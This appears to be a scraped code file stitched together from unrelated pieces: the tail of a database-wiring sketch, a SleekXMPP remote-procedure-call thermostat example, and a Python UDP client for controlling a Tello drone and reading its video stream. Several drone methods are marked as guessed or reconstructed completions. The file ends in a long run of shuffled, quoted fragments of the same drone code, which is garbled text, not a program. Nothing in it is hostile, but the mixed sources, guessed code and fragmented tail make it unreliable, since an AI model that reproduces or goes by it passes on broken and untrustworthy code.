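# public properties is a shortcut for this sketch; the real module fills the
# structures inside Database.__init__. The '90d' literal is again assumed to
# be a valid time literal.
def _demo_database_wiring() -> None:
    db = Database("spp")
    db.retention_policies.add(RetentionPolicy("autogen", db, "90d", default=True))
    jobs = Table(db, "jobs", fields={"duration": Datatype.INT}, tags=["jobName"])
    db.tables["jobs"] = jobs
    assert db["jobs"] is jobs                # predefined tables come back as-is
    assert db["unknown"].name == "unknown"   # unknown names yield an empty table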
<gh_stars>1-10
"""
    SleekXMPP: The Sleek XMPP Library
    Copyright (C) 2011 <NAME>
    This file is part of SleekXMPP.

    See the file LICENSE for copying permission.
"""
from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \
    ANY_ALL
import threading


class Thermostat(Endpoint):

    def FQN(self):
        return 'thermostat'

    # note: named __init (not __init__) -- Endpoint appears to reserve the
    # real constructor for the RPC session plumbing
    def __init(self, initial_temperature):
        self._temperature = initial_temperature
        self._event = threading.Event()

    @remote
    def set_temperature(self, temperature):
        print("Setting temperature to %s" % temperature)
        self._temperature = temperature

    @remote
    def get_temperature(self):
        return self._temperature

    @remote(False)
    def release(self):
        self._event.set()

    def wait_for_release(self):
        self._event.wait()


def main():
    session = Remote.new_session('sleek@xmpp.org/rpc', '*****')
    thermostat = session.new_handler(ANY_ALL, Thermostat, 18)
    thermostat.wait_for_release()
    session.close()


if __name__ == '__main__':
    main()
import cv2
import re
import time
import socket
import threading


class Response(object):
    def __init__(self):
        pass

    def recv(self, data):
        pass

    def pop(self):
        pass

    def empty(self):
        pass


class Command(Response):
    def __init__(self):
        super(Command, self).__init__()
        self.response = None
        self.lock = threading.RLock()

    def recv(self, data):
        with self.lock:
            self.response = data.decode('utf-8')

    def pop(self):
        with self.lock:
            response, self.response = self.response, None
            return response

    def empty(self):
        with self.lock:
            return self.response is None


class State(Response):
    def __init__(self):
        super(State, self).__init__()
        self.response = None
        self.lock = threading.RLock()

    def recv(self, data):
        with self.lock:
            # assumed completion: state datagrams look like 'pitch:0;roll:0;...;'
            self.response = {item.split(':')[0]: float(item.split(':')[1])
                             for item in data.decode('utf-8').strip().split(';') if item}

    def pop(self):
        with self.lock:
            return self.response

    def empty(self):
        return False


class Client(object):
    def __init__(self, local_port, buffer_size, daemon, response):
        self.response = response
        self.buffer_size = buffer_size
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.socket.bind(('', local_port))
        self.receive_thread = threading.Thread(target=self._receive_thread)
        self.receive_thread.daemon = daemon
        self.receive_thread.start()

    def __del__(self):
        """Closes the local socket."""
        self.socket.close()

    def _receive_thread(self):
        """Listens for responses from the Tello.

        Runs as a thread, sets self.response to whatever the Tello last returned.
        """
        while True:
            try:
                self.response.recv(self.socket.recv(self.buffer_size))
            except Exception as e:
                print(e)
                break

    def pop(self):
        return self.response.pop()

    def empty(self):
        return self.response.empty()


class Video(object):
    def __init__(self, daemon):
        self.video = cv2.VideoCapture('udp://@0.0.0.0:11111')
        if not self.video.isOpened():
            raise RuntimeError('Failed to connect to Tello')
        self.frame = None
        self.lock = threading.RLock()
        self.thread = threading.Thread(target=self._update_thread)
        self.thread.daemon = daemon
        self.thread.start()

    def __del__(self):
        self.video.release()

    def _update_thread(self):
        while True:
            ok, frame = self.video.read()
            if ok:
                with self.lock:
                    self.frame = frame

    def pop(self):
        with self.lock:
            frame, self.frame = self.frame, None
            return frame

    def empty(self):
        with self.lock:
            return self.frame is None
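

# --- Illustrative sketch, not part of the original module ----------------
# Why the Response hierarchy exists: Client is a dumb UDP pump, and the
# Response subclass it is handed decides how datagrams are interpreted
# (Command keeps the latest reply and clears it on pop(); State re-parses
# every packet into a dict). The loopback check below exercises that plumbing
# without a drone; port 9999 is an arbitrary choice for the test.
def _demo_client_loopback():
    client = Client(9999, 1024, True, Command())
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    probe.sendto(b'ok', ('127.0.0.1', 9999))
    time.sleep(0.1)              # give the receive thread a moment
    assert client.pop() == 'ok'  # Command decodes and hands the reply over once
    assert client.empty()        # ...after which the slot is empty again
    probe.close()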


class Tello(object):
    def __init__(self, local_port, command_timeout, state=True, video=True):
        """Connects to Tello in command mode.

        Args:
            local_port (int): port of local machine for receiving command response.
            command_timeout (float): seconds to wait for a response to a command.
            state (bool): receive state updates from Tello?
            video (bool): receive video from Tello?

        Raises:
            RuntimeError: If the Tello rejects the attempt to enter command mode.
        """
        self.command_timeout = command_timeout
        self.response_client = Client(local_port, 1024, True, Command())
        # reconstructed: the Tello pushes state datagrams to UDP port 8890
        self.state_client = Client(8890, 1024, True, State()) if state else None
        self.tello_address = ('192.168.10.1', 8889)
        self.enter_command_mode()
        self.video_client = None
        if video:
            self.open_video_stream()
            self.video_client = Video(True)

    def send_command(self, command, with_return=True):
        """Sends a command to the Tello and waits for a response.

        If self.command_timeout is exceeded before a response is received,
        a RuntimeError exception is raised.

        Args:
            command (str): Command to send.

        Returns:
            str: Response from Tello.

        Raises:
            RuntimeError: If no response is received within self.timeout seconds.
        """
        self.response_client.pop()  # drop any stale response first
        # reconstructed send/wait loop: commands go out over the response
        # client's socket, replies come back on the same port
        self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address)
        if not with_return:
            return None
        start = time.time()
        while self.response_client.empty():
            if time.time() - start > self.command_timeout:
                raise RuntimeError('No response to command')
        return self.response_client.pop()

    def state(self):
        return self.state_client.pop() if self.state_client else None

    def frame(self):
        if self.video_client is None:
            raise RuntimeError('Video is not available')
        while self.video_client.empty():
            pass
        return self.video_client.pop()

    def enter_command_mode(self):
        if self.send_command('command') != 'ok':
            raise RuntimeError('Tello rejected the attempt to enter command mode')

    def take_off(self):
        """
        return: 'ok' or 'error'
        """
        return self.send_command('takeoff')

    def land(self):
        """
        return: 'ok' or 'error'
        """
        return self.send_command('land')

    def open_video_stream(self):
        if self.send_command('streamon') != 'ok':
            raise RuntimeError('Tello rejected to open the video stream')

    def close_video_stream(self):
        """
        return: 'ok' or 'error'
        """
        return self.send_command('streamoff')

    def emergency_shutdown(self):
        """
        return: 'ok' or 'error'
        """
        return self.send_command('emergency')

    def move_up(self, x, with_return=False):
        """
        param x: int, [20, 500]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('up {}'.format(x), with_return)

    def move_down(self, x, with_return=False):
        """
        param x: int, [20, 500]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('down {}'.format(x), with_return)

    def move_left(self, x, with_return=False):
        """
        param x: int, [20, 500]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('left {}'.format(x), with_return)

    def move_right(self, x, with_return=False):
        """
        param x: int, [20, 500]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('right {}'.format(x), with_return)

    def move_forward(self, x, with_return=False):
        """
        param x: int, [20, 500]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('forward {}'.format(x), with_return)

    def move_backward(self, x, with_return=False):
        """
        param x: int, [20, 500]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('back {}'.format(x), with_return)

    def rotate_clockwise(self, x, with_return=False):
        """
        param x: int, [1, 360]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('cw {}'.format(x), with_return)

    def rotate_counter_clockwise(self, x, with_return=False):
        """
        param x: int, [1, 360]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('ccw {}'.format(x), with_return)

    def flip_left(self, with_return=False):
        """
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('flip l', with_return)

    def flip_right(self, with_return=False):
        """
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('flip r', with_return)

    def flip_forward(self, with_return=False):
        """
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('flip f', with_return)

    def flip_backward(self, with_return=False):
        """
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('flip b', with_return)

    def goto(self, x, y, z, speed, with_return=False):
        """
        param x: int, [20, 500]
        param y: int, [20, 500]
        param z: int, [20, 500]
        param speed: int, [10-100]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('go {} {} {} {}'.format(x, y, z, speed), with_return)

    def goto_curve(self, x1, y1, z1, x2, y2, z2, speed, with_return=False):
        """fly a curve defined by (0, 0, 0), (x1, y1, z1), (x2, y2, z2) with speed

        param x1, x2: int, [-500, 500]
        param y1, y2: int, [-500, 500]
        param z1, z2: int, [-500, 500]
        param speed: int, [10-60]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('curve {} {} {} {} {} {} {}'.format(
            x1, y1, z1, x2, y2, z2, speed), with_return)

    def set_speed(self, speed, with_return=False):
        """
        param speed: int, [10-100]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('speed {}'.format(speed), with_return)

    def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity,
                                      up_down_velocity, rotate_velocity, with_return=False):
        """
        param left_right_velocity: int, [-100, 100]
        param forward_backward_velocity: int, [-100, 100]
        param up_down_velocity: int, [-100, 100]
        param rotate_velocity: int, [-100, 100]
        param with_return: bool
        return: 'ok' or 'error'
        """
        return self.send_command('rc {} {} {} {}'.format(
            left_right_velocity, forward_backward_velocity,
            up_down_velocity, rotate_velocity), with_return)

    def get(self, command, split=False):
        """
        param command: str, query to send
        param split: bool, multiple values?
        return: int or list(int)
        """
        result = self.send_command(command)
        if split:
            # assumed completion: collect every integer of a multi-value reply
            return [int(x) for x in re.findall(r'-?\d+', result)]
        # assumed completion: single-value replies may carry a unit suffix
        return int(re.search(r'-?\d+', result).group())

    def get_battery(self):
        """
        return: int, [0, 100]
        """
        return self.get('battery?')

    def get_flight_time(self):
        """
        return: int
        """
        return self.get('time?')

    def get_relative_height(self):
        """
        return: int, [10, ...]
        """
        return self.get('height?')

    def get_temperature(self):
        """
        return: int, [0, 90]
        """
        return self.get('temp?')

    def get_imu_pose(self):
        """[pitch, roll, yaw]
        return: list(int), [[-89, 89], [-179, 179], [-179, 179]]
        """
        # 'attitude?' is the SDK query assumed here
        return self.get('attitude?', split=True)

    def get_imu_acceleration(self):
        """
        return: list(int)
        """
        return self.get('acceleration?', split=True)

    def get_tof_height(self):
        """
        return: int, [10, 400]; 6553: out of range
        """
        return self.get('tof?')
return: int or list(int)", "pass def pop(self): pass def empty(self): pass class Command(Response): def", "= threading.RLock() def recv(self, data): with self.lock: self.response = data.decode('utf-8')", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('speed", "or 'error' \"\"\" return self.send_command('flip b', with_return) def goto(self, x,", "a response is received, a RuntimeError exception is raised. Args:", "return self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\" param", ">= self.command_timeout: raise RuntimeError('No response to command') return self.response_client.pop() def", "self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self): \"\"\"Closes", "recv(self, data): with self.lock: self.response = data.decode('utf-8') def pop(self): with", "video stream') def close_video_stream(self): \"\"\" return: 'ok' or 'error' \"\"\"", "\"\"\" return self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\" param x:", "with_return) def flip_backward(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "def get_battery(self): \"\"\" return: int, [0, 100] \"\"\" return self.get('battery?')", "flip_backward(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error'", "with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if", "def enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the", "get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return self.get('acceleration?', split=True) def get_tof_height(self):", "int, [10-60] param with_return: bool return: 'ok' or 'error' \"\"\"", "def empty(self): pass class Command(Response): def __init__(self): super(Command, self).__init__() self.response", "True, State()) if state else None self.tello_address = ('192.168.10.1', 8889)", "self.command_timeout: raise RuntimeError('No response to command') return self.response_client.pop() def state(self):", "self.response, None return response def empty(self): with self.lock: return self.response", "int, [1, 3600] param with_return: bool return: 'ok' or 'error'", "move_right(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "str: Response from Tello. Raises: RuntimeError: If no response is", "goto_curve(self, x1, y1, z1, x2, y2, z2, speed, with_return=False): \"\"\"fly", "x1, x2: int, [-500, 500] param y1, y2: int, [-500,", "receiving command response. 
command_timeout (float): seconds to wait for a", "self.state_client = Client(8890, 1024, True, State()) if state else None", "[10-60] param with_return: bool return: 'ok' or 'error' \"\"\" return", "self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\" param x:", "[20, 500] param y: int, [20, 500] param z: int,", "empty(self): return False class Client(object): def __init__(self, local_port, buffer_size, daemon,", "= None if video: self.open_video_stream() self.video_client = Video(True) def send_command(self,", "z1), (x2, y2, z2) with speed param x1, x2: int,", "with_return) def move_down(self, x, with_return=False): \"\"\" param x: int, [20,", "x in result.split(' ')] else: return int(result) def get_speed(self): \"\"\"", "90] \"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return:", "return: 'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x), with_return) def", "threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release() def _update_thread(self):", "'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity,", "param left_right_velocity: int, [-100, 100] param forward_backward_velocity: int, [-100, 100]", "z1, z2: int, [-500, 500] param speed: int, [10-60] param", "def pop(self): with self.lock: response, self.response = self.response, None return", "def flip_backward(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or", "= frame def empty(self): with self.lock: return self.frame is None", "int(result) def get_speed(self): \"\"\" return: int, [10, 100] \"\"\" return", "self.response = {} self.lock = threading.RLock() def recv(self, data): with", "self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from the Tello. Runs", "while True: ok, frame = self.video.read() if ok: with self.lock:", "def get_tof_height(self): \"\"\" return: int, [10, 400]; 6553: out of", "self.lock: return self.frame is None def pop(self): with self.lock: frame,", "multiple values? return: int or list(int) \"\"\" result = self.send_command(command)", "Command()) self.state_client = Client(8890, 1024, True, State()) if state else", "param y1, y2: int, [-500, 500] param z1, z2: int,", "return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int), [[-89,", "buffer_size, daemon, response): self.response = response self.buffer_size = buffer_size self.socket", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('emergency') def move_up(self,", "return False class Client(object): def __init__(self, local_port, buffer_size, daemon, response):", "return self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\" param with_return:", "return self.send_command('flip r', with_return) def flip_forward(self, with_return=False): \"\"\" param with_return:", "def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int), [[-89, 89], [-179,", "command, with_return=True): \"\"\"Sends a command to the Tello and waits", "self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return", "def __init__(self, local_port, buffer_size, daemon, response): self.response = response self.buffer_size", "a response. 
If self.command_timeout is exceeded before a response is", "self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw] return: list(int), [[-89, 89],", "\"\"\" return self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok' or 'error'", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip l',", "self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False): \"\"\" param x:", "def __init__(self): pass def recv(self, data): pass def pop(self): pass", "is None class State(Response): def __init__(self): super(State, self).__init__() self.response =", "bool return: 'ok' or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return)", "def get_temperature(self): \"\"\" return: int, [0, 90] \"\"\" return self.get('temp?')", "__del__(self): self.video.release() def _update_thread(self): while True: ok, frame = self.video.read()", "self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':'", "recv(self, data): pass def pop(self): pass def empty(self): pass class", "def flip_right(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or", "else None def read_frame(self): if self.video_client is None: raise RuntimeError('Video", "land(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('land') def", "self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st = time.time() while", "[-100, 100] param with_return: bool return: 'ok' or 'error' \"\"\"", "send_command(self, command, with_return=True): \"\"\"Sends a command to the Tello and", "param y: int, [20, 500] param z: int, [20, 500]", "Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a command to the", "to command') return self.response_client.pop() def state(self): return self.state_client.pop() if self.state_client", "return self.response.pop() class Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111')", "for item in data.decode('utf-8').split(';') if ':' in item} def pop(self):", "st >= self.command_timeout: raise RuntimeError('No response to command') return self.response_client.pop()", "= {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in item}", "self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False): \"\"\" param x:", "return: int or list(int) \"\"\" result = self.send_command(command) if split:", "command (str): Command to send. 
Returns: str: Response from Tello.", "'ok' or 'error' \"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity,", "in item} def pop(self): return self.response def empty(self): return False", "self.tello_address) if not with_return: return st = time.time() while self.response_client.empty():", "speed param x1, x2: int, [-500, 500] param y1, y2:", "'ok' or 'error' \"\"\" return self.send_command('flip r', with_return) def flip_forward(self,", "Raises: RuntimeError: If the Tello rejects the attempt to enter", "close_video_stream(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('streamoff') def", "frame, self.frame = self.frame, None return frame class Tello(object): def", "with_return=False): \"\"\" param x: int, [20, 500] param with_return: bool", "= self.frame, None return frame class Tello(object): def __init__(self, local_port=9999,", "self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\" param with_return: bool", "def read_frame(self): if self.video_client is None: raise RuntimeError('Video is not", "y1, y2: int, [-500, 500] param z1, z2: int, [-500,", "flip_right(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error'", "of command. state (bool): receive state from Tello? video (bool):", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('go {}", "param x: int, [1, 3600] param with_return: bool return: 'ok'", "with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param", "of local machine for receiving command response. command_timeout (float): seconds", "self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start()", "time.time() - st >= self.command_timeout: raise RuntimeError('No response to command')", "self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "or 'error' \"\"\" return self.send_command('takeoff') def land(self): \"\"\" return: 'ok'", "def get(self, command, split=False): \"\"\" param command param split: bool,", "video from Tello? Raises: RuntimeError: If the Tello rejects the", "\"\"\" param speed: int, [10-100] param with_return: bool return: 'ok'", "from Tello? video (bool): receive video from Tello? Raises: RuntimeError:", "break def empty(self): return self.response.empty() def pop(self): return self.response.pop() class", "not with_return: return st = time.time() while self.response_client.empty(): if time.time()", "self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None if video:", "command mode or open the video stream. \"\"\" self.command_timeout =", "mode. Args: local_port (int): port of local machine for receiving", "enter command mode or open the video stream. \"\"\" self.command_timeout", "\"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False): \"\"\"", "[20, 500] param z: int, [20, 500] param speed: int,", "in data.decode('utf-8').split(';') if ':' in item} def pop(self): return self.response", "None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon", "\"\"\"Connects to Tello in command mode. 
Args: local_port (int): port", "is not available') while self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self):", "self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\" param with_return: bool", "_update_thread(self): while True: ok, frame = self.video.read() if ok: with", "z, speed, with_return=False): \"\"\" param x: int, [20, 500] param", "return: 'ok' or 'error' \"\"\" return self.send_command('curve {} {} {}", "def set_speed(self, speed, with_return=False): \"\"\" param speed: int, [10-100] param", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x),", "Tello? Raises: RuntimeError: If the Tello rejects the attempt to", "return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int)", "def take_off(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('takeoff')", "state from Tello? video (bool): receive video from Tello? Raises:", "wait for a response of command. state (bool): receive state", "return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return: int, [10, 400];", "self.response = self.response, None return response def empty(self): with self.lock:", "return self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\" param with_return:", "= {} self.lock = threading.RLock() def recv(self, data): with self.lock:", "seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st", "as a thread, sets self.response to whatever the Tello last", "[-179, 179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return:", "up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False): \"\"\" param command", "return st = time.time() while self.response_client.empty(): if time.time() - st", "def pop(self): pass def empty(self): pass class Command(Response): def __init__(self):", "return self.frame is None def pop(self): with self.lock: frame, self.frame", "self.send_command('forward {}'.format(x), with_return) def move_backward(self, x, with_return=False): \"\"\" param x:", "socket import threading class Response(object): def __init__(self): pass def recv(self,", "daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed to", "is exceeded before a response is received, a RuntimeError exception", "with_return) def get(self, command, split=False): \"\"\" param command param split:", "\"\"\" param command param split: bool, multiple values? 
return: int", "class Command(Response): def __init__(self): super(Command, self).__init__() self.response = None self.lock", "\"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port, 1024, True, Command())", "return: int, [10, 3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\"", "{} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed),", "\"\"\" return: int \"\"\" return self.get('time?') def get_relative_height(self): \"\"\" return:", "return self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\" param", "daemon, response): self.response = response self.buffer_size = buffer_size self.socket =", "self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon", "daemon self.thread.start() def __del__(self): self.video.release() def _update_thread(self): while True: ok,", "100] param up_down_velocity: int, [-100, 100] param rotate_velocity: int, [-100,", "State()) if state else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode()", "bool return: 'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return)", "list(int) \"\"\" result = self.send_command(command) if split: return [int(x) for", "{} {} {} {} {} {}'.format(x1, y1, z1, x2, y2,", "if split: return [int(x) for x in result.split(' ')] else:", "response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port))", "self.response = response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)", "try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e) break def empty(self):", "def emergency_shutdown(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('emergency')", "split: return [int(x) for x in result.split(' ')] else: return", "values? return: int or list(int) \"\"\" result = self.send_command(command) if", "def move_forward(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "response): self.response = response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET,", "self.frame is None def pop(self): with self.lock: frame, self.frame =", "if not with_return: return st = time.time() while self.response_client.empty(): if", "if state else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client", "raise RuntimeError('No response to command') return self.response_client.pop() def state(self): return", "received, a RuntimeError exception is raised. Args: command (str): Command", "Raises: RuntimeError: If no response is received within self.timeout seconds.", "self.video_client = Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a command", "up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100, 100] param", "bool return: 'ok' or 'error' \"\"\" return self.send_command('down {}'.format(x), with_return)", "def get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self):", "param command param split: bool, multiple values? 
return: int or", "the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from", "not self.video.isOpened(): raise RuntimeError('Failed to connect to Tello') self.frame =", "video stream. \"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port, 1024,", "waits for a response. If self.command_timeout is exceeded before a", "self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\" param x:", "__init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed", "a command to the Tello and waits for a response.", "\"\"\" return self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\" param", "or 'error' \"\"\" return self.send_command('curve {} {} {} {} {}", "param forward_backward_velocity: int, [-100, 100] param up_down_velocity: int, [-100, 100]", "def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise", "RuntimeError: If no response is received within self.timeout seconds. \"\"\"", "attempt to enter command mode or open the video stream.", "x, y, z, speed, with_return=False): \"\"\" param x: int, [20,", "{} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2,", "returned. \"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e:", "def move_left(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "local_port, buffer_size, daemon, response): self.response = response self.buffer_size = buffer_size", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('rc", "the attempt to enter command mode or open the video", "received within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not", "def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity:", "for x in result.split(' ')] else: return int(result) def get_speed(self):", "bool return: 'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return)", "= None self.lock = threading.RLock() def recv(self, data): with self.lock:", "'ok' or 'error' \"\"\" return self.send_command('takeoff') def land(self): \"\"\" return:", "\"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st =", "open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected to open", "raised. Args: command (str): Command to send. 
Returns: str: Response", "import cv2 import time import socket import threading class Response(object):", "else: return int(result) def get_speed(self): \"\"\" return: int, [10, 100]", "z1, x2, y2, z2, speed), with_return) def set_speed(self, speed, with_return=False):", "def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens", "self.video_client = None if video: self.open_video_stream() self.video_client = Video(True) def", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('up", "open the video stream') def close_video_stream(self): \"\"\" return: 'ok' or", "\"\"\" return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return:", "!= 'ok': raise RuntimeError('Tello rejected the attempt to enter command", "def _receive_thread(self): \"\"\"Listens for responses from the Tello. Runs as", "'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self,", "{item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in item} def", "def pop(self): return self.response.pop() class Video(object): def __init__(self, daemon=True): self.video", "e: print(e) break def empty(self): return self.response.empty() def pop(self): return", "or 'error' \"\"\" return self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok'", "Exception as e: print(e) break def empty(self): return self.response.empty() def", "pass def recv(self, data): pass def pop(self): pass def empty(self):", "enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the attempt", "result.split(' ')] else: return int(result) def get_speed(self): \"\"\" return: int,", "return: int, [10, 100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\"", "'error' \"\"\" return self.send_command('flip b', with_return) def goto(self, x, y,", "1024, True, Command()) self.state_client = Client(8890, 1024, True, State()) if", "RuntimeError('No response to command') return self.response_client.pop() def state(self): return self.state_client.pop()", "local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from the", "raise RuntimeError('Tello rejected to open the video stream') def close_video_stream(self):", "state=True, video=True): \"\"\"Connects to Tello in command mode. Args: local_port", "{} {} {} {} {} {} {}'.format(x1, y1, z1, x2,", "list(int), [[-89, 89], [-179, 179], [-179, 179]] \"\"\" return self.get('attitude?',", "Tello? video (bool): receive video from Tello? Raises: RuntimeError: If", "threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self):", "to Tello in command mode. Args: local_port (int): port of", "except Exception as e: print(e) break def empty(self): return self.response.empty()", "def empty(self): with self.lock: return self.frame is None def pop(self):", "state (bool): receive state from Tello? 
